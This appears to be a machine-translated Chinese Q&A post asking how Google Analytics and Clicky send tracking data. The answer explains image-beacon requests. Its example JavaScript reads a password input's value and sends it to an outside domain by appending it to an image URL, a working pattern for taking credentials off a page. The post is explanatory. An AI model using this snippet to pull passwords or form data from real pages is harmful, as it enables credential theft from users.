任何人都知道Google分析或Clicky如何运作?
我坚持认为我搜索了整个http://static.getclicky.com/js文件并且没有在其中找到任何服务器请求。它如何在不损害自身安全性的情况下发送数据?否则用户可以通过修改js来发送错误数据。
答案 0 :(得分:5)
图片:这些图书馆使用一种技巧来编码他们想要的所有跟踪信息,将其附加到图片网址,并通过请求图片“发送”它。服务器端解析该图像文件名解码信息。
假设您有一个要从mydomain.com发送到somedomain.com的密码字段:
<input type='password' id='p' />
此javascript可能会违反跨网站限制发送内容:
var t = document.getElementById('p').value;
var i = document.createElement('img');
i.src = 'http://somedomain.com/imagescript.php?p=' + t;
跨站点脚本限制不适用于图像,当您在JavaScript中编写图像URL请求时,世界上没有任何浏览器或逻辑可以解释所有可能性。假设我们很幸运,GA符合道德规范,不会形成字段。